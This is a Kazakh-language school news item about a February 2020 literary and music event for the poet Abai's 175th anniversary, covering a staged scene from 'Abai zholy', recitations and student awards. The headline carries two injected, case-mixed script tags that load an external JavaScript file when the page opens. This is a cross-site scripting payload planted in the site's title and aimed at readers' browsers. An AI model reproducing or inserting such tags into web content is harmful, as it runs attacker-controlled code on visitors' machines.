Өлмейтұғын артына сөз қалдырған<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.02.2020

     21–ақпан күні мектебімізде Ұлы ақын Абай Құнанбайұлының 175 жылдығының аясында өткізілген «Өлмейтұғын артына сөз қалдырған» атты әдеби - музыкалық іс–шара онкүндіктің жабылуына арналды.  

     7 «А» сынып оқушылары мен ұстаздарының қатысуымен М.Әуезовтың «Абай жолы» романынан сахналық қойылым көрсетілді. Орыс тілінде оқытылатын 5 – 6 сыныптың оқушылары Абайдың табиғат лирикасына арнаған өлеңдерін қазақ тілінде жатқа оқыды. 

     Бұл іс – шарада Абай аудармалары соның ішінде «Онегинің Татьянаға жазған хатын» 10 «Б» сынып оқушысы Шпрингер Кирилл мен 7 «А» сынып Оқушысы Қожамқұл Бибінұр нақышына келтіріп орындады. Абайдың даналыққа жазылған қарасөздерін оқыды және  композитордың  әсем әуендерін шырқады.

     Мерекелік іс-шараның соңында мектеп директоры Абилова А.С., өзінің құттық сөзін сөйлеп, белсенді қатысқан оқушыларды мақтау қағазымен марапаттады және сыйлықтар берді.

 

Просмотров: 554


Пікір қосу



Деректерді қолтаңбаға қосу